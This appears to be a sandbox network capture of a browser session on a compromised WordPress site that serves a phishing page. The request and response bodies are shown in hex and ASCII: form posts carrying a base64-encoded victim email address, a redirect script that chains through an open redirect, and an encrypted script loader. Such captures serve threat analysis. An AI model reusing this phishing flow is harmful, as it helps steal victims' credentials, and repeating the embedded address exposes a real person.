                                                                                                      2024-10-30 16:12:51 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29
                                                                                                      Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.1649714192.243.110.54437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:12:51 UTC778OUTPOST /wp-admin/maint/404.php HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      Content-Length: 169
                                                                                                      Cache-Control: max-age=0
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      Origin: null
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: document
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:12:51 UTC169OUTData Raw: 63 6f 64 3d 37 39 37 39 36 37 37 30 34 62 35 33 36 39 33 32 33 30 37 34 36 34 35 30 37 61 36 33 36 62 37 33 35 33 35 35 33 30 37 32 34 63 36 33 33 37 34 64 37 61 33 39 34 64 37 32 35 34 37 34 35 32 34 63 37 61 37 33 32 66 35 36 35 34 33 38 36 63 34 66 35 34 34 38 34 63 35 38 37 61 33 38 37 38 34 63 35 33 36 31 33 33 35 31 37 39 37 39 36 61 34 61 37 61 35 31 34 35 34 31 26 65 3d 59 57 52 6c 63 6d 6c 6a 61 30 42 6b 5a 58 4a 70 59 32 74 6b 5a 58 4a 74 59 58 52 76 62 47 39 6e 65 53 35 6a 62 32 30 25 33 44
                                                                                                      Data Ascii: cod=797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541&e=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20%3D
                                                                                                      2024-10-30 16:12:51 UTC384INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      content-length: 2187
                                                                                                      date: Wed, 30 Oct 2024 16:12:51 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:12:51 UTC984INData Raw: 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 6d 61 72 67 69 6e 3a 33 30 70 78 3b
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex, nofollow"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><style>body,html{margin:30px;
                                                                                                      2024-10-30 16:12:51 UTC1203INData Raw: 38 70 78 3b 7d 2e 70 72 6f 70 6f 72 74 69 6f 6e 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 31 34 34 6d 73 3b 7d 2e 70 72 6f 70 6f 72 74 69 6f 6e 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 3a 61 66 74 65 72 20 7b 74 6f 70 3a 20 37 32 70 78 3b 6c 65 66 74 3a 20 34 30 70 78 3b 7d 2e 70 72 6f 70 6f 72 74 69 6f 6e 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 31 38 30 6d 73 3b 7d 2e 70 72 6f 70 6f 72 74 69 6f 6e 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 3a 61 66 74 65 72 20 7b 74 6f 70 3a 20 37 31 70 78 3b 6c 65 66 74 3a 20 33 32 70 78 3b 7d 2e 70 72 6f 70 6f 72 74 69 6f 6e 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c
                                                                                                      Data Ascii: 8px;}.proportion div:nth-child(4) {animation-delay: -144ms;}.proportion div:nth-child(4):after {top: 72px;left: 40px;}.proportion div:nth-child(5) {animation-delay: -180ms;}.proportion div:nth-child(5):after {top: 71px;left: 32px;}.proportion div:nth-chil


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.1649715192.243.110.54437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:12:51 UTC610OUTGET /favicon.ico HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                      Sec-Fetch-Dest: image
                                                                                                      Referer: https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:12:51 UTC434INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1238
                                                                                                      date: Wed, 30 Oct 2024 16:12:51 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:12:51 UTC934INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s
                                                                                                      2024-10-30 16:12:51 UTC304INData Raw: 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e
                                                                                                      Data Ascii: 5, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over con


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.1649716184.28.90.27443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:12:51 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: identity
                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                      Host: fs.microsoft.com
                                                                                                      2024-10-30 16:12:52 UTC465INHTTP/1.1 200 OK
                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                      Content-Type: application/octet-stream
                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                      Server: ECAcc (lpl/EF70)
                                                                                                      X-CID: 11
                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                      Cache-Control: public, max-age=1942
                                                                                                      Date: Wed, 30 Oct 2024 16:12:52 GMT
                                                                                                      Connection: close
                                                                                                      X-CID: 2


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.1649720184.28.90.27443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:12:53 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: identity
                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                      Range: bytes=0-2147483646
                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                      Host: fs.microsoft.com
                                                                                                      2024-10-30 16:12:53 UTC514INHTTP/1.1 200 OK
                                                                                                      ApiVersion: Distribute 1.1
                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                      Content-Type: application/octet-stream
                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                      X-CID: 11
                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                      Cache-Control: public, max-age=25973
                                                                                                      Date: Wed, 30 Oct 2024 16:12:53 GMT
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      X-CID: 2
                                                                                                      2024-10-30 16:12:53 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.1649722192.243.110.54437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:12:55 UTC857OUTPOST /wp-admin/maint/404.php HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      Content-Length: 167
                                                                                                      Cache-Control: max-age=0
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      Origin: https://clinicaaryal.com
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: document
                                                                                                      Referer: https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:12:55 UTC167OUTData Raw: 61 3d 37 39 37 39 36 37 37 30 34 62 35 33 36 39 33 32 33 30 37 34 36 34 35 30 37 61 36 33 36 62 37 33 35 33 35 35 33 30 37 32 34 63 36 33 33 37 34 64 37 61 33 39 34 64 37 32 35 34 37 34 35 32 34 63 37 61 37 33 32 66 35 36 35 34 33 38 36 63 34 66 35 34 34 38 34 63 35 38 37 61 33 38 37 38 34 63 35 33 36 31 33 33 35 31 37 39 37 39 36 61 34 61 37 61 35 31 34 35 34 31 26 62 3d 59 57 52 6c 63 6d 6c 6a 61 30 42 6b 5a 58 4a 70 59 32 74 6b 5a 58 4a 74 59 58 52 76 62 47 39 6e 65 53 35 6a 62 32 30 25 33 44
                                                                                                      Data Ascii: a=797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541&b=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20%3D
                                                                                                      2024-10-30 16:12:55 UTC383INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      content-length: 402
                                                                                                      date: Wed, 30 Oct 2024 16:12:55 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:12:55 UTC402INData Raw: 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 72 2e 67 2e 62 69 6e 67 2e 63 6f 6d 2f 62 61 6d 2f 61 63 3f 21 26 26 75 3d 61 31 61 48 52 30 63 48 4d 36 4c 79 39 79 4c 6d 63 75 59 6d 6c 75 5a 79 35 6a 62 32 30 76 59 6d 46 74 4c 32 46 6a 50 79 45 6d 4a 6e 55 39 59 54 46 68 53 46 49 77 59 30 68 4e 4e 6b 78 35 4f 58 6c 4d 62 57 4e 31 57 57 31 73 64 56 70 35 4e 57 70 69 4d 6a 42 32 57 57 31 47 64 45 77 79 52 6d 70 51 65 55 56 74 53 6d 35 56 4f 56 6c 55 52 6d 68 54 52 6b 6c 33 57 54 42 6f 54 6b 35 72 65 44 56 50 56 33 68 70 55 6a 4a 33 64 31 64 73 5a 47 46 4e 56 30 31 35 59 6b 68 61 61 57 46 55 56 6a 5a 58 56 6b 30 78 59 57 31 4a 65 55 31 49 57 6d 46 53 4d 31 4a 76 56 31 64 30
                                                                                                      Data Ascii: <script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9yLmcuYmluZy5jb20vYmFtL2FjPyEmJnU9YTFhSFIwY0hNNkx5OXlMbWN1WW1sdVp5NWpiMjB2WW1GdEwyRmpQeUVtSm5VOVlURmhTRkl3WTBoTk5reDVPV3hpUjJ3d1dsZGFNV015YkhaaWFUVjZXVk0xYW1JeU1IWmFSM1JvV1d0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.16497244.175.87.197443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:12:56 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=m+V8WmbNk+DLE5l&MD=1G1bEnf1 HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                      Host: slscr.update.microsoft.com
                                                                                                      2024-10-30 16:12:56 UTC560INHTTP/1.1 200 OK
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Expires: -1
                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                      MS-CorrelationId: 0fa601ce-0f61-4bee-a1bd-03c7c9c97b98
                                                                                                      MS-RequestId: 08475caf-2acc-47c6-b925-339cbd320dc0
                                                                                                      MS-CV: flk97MIAQE29rP7t.0
                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Date: Wed, 30 Oct 2024 16:12:55 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 24490
                                                                                                      2024-10-30 16:12:56 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                      2024-10-30 16:12:56 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.1649887192.243.110.54438056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:20 UTC721OUTGET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Accept: */*
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                      Sec-Fetch-Dest: script
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:20 UTC389INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/javascript;charset=UTF-8
                                                                                                      content-length: 2074
                                                                                                      date: Wed, 30 Oct 2024 16:13:20 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:20 UTC979INData Raw: 76 61 72 20 61 70 70 72 65 63 69 61 74 65 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 61 70 70 72 65 63 69 61 74 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 61 70 70 72 65 63 69 61 74 65 29 3b 0d 0a 61 70 70 72 65 63 69 61 74 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62
                                                                                                      Data Ascii: var appreciate= document.createElement("script");appreciate.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(appreciate);appreciate.onload=function(){var {a,b,c,d} = JSON.parse(atob
                                                                                                      2024-10-30 16:13:20 UTC1095INData Raw: 4e 6a 4f 44 68 69 4f 44 45 7a 5a 6a 4e 69 4e 6a 56 68 4e 6a 67 35 4e 54 42 6d 4f 44 6b 34 5a 47 55 69 4c 43 4a 69 49 6a 6f 69 59 7a 49 79 4e 57 45 35 4e 6d 51 34 4d 54 4a 69 4e 44 67 78 4e 47 4a 6b 4e 47 4d 33 59 6a 4d 33 5a 47 46 6b 4e 57 4e 6b 4f 57 59 31 4f 47 4e 6c 4f 47 59 30 4e 54 41 7a 5a 54 46 68 5a 44 42 68 4e 6d 46 6c 59 6a 56 6a 4d 7a 4e 6d 5a 54 6c 69 4d 6d 59 32 5a 6a 68 6a 4e 32 56 68 4f 57 49 31 4f 54 6b 34 59 54 63 77 4e 7a 63 33 4e 57 46 6b 59 54 49 79 4d 47 45 77 4e 44 4e 68 4e 54 42 6a 4d 57 5a 68 4e 44 49 78 4f 44 4d 79 4d 47 4a 6d 4e 44 67 33 4d 6a 52 69 4e 32 45 31 5a 54 64 6d 4e 47 49 34 5a 6d 56 69 5a 47 55 33 4d 7a 68 6d 5a 57 52 69 4d 44 51 78 59 7a 63 33 4e 7a 5a 6a 4d 6a 67 77 59 54 6b 7a 59 54 4d 79 4d 6a 46 69 59 57 56 6b 4d
                                                                                                      Data Ascii: NjODhiODEzZjNiNjVhNjg5NTBmODk4ZGUiLCJiIjoiYzIyNWE5NmQ4MTJiNDgxNGJkNGM3YjM3ZGFkNWNkOWY1OGNlOGY0NTAzZTFhZDBhNmFlYjVjMzNmZTliMmY2ZjhjN2VhOWI1OTk4YTcwNzc3NWFkYTIyMGEwNDNhNTBjMWZhNDIxODMyMGJmNDg3MjRiN2E1ZTdmNGI4ZmViZGU3MzhmZWRiMDQxYzc3NzZjMjgwYTkzYTMyMjFiYWVkM


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
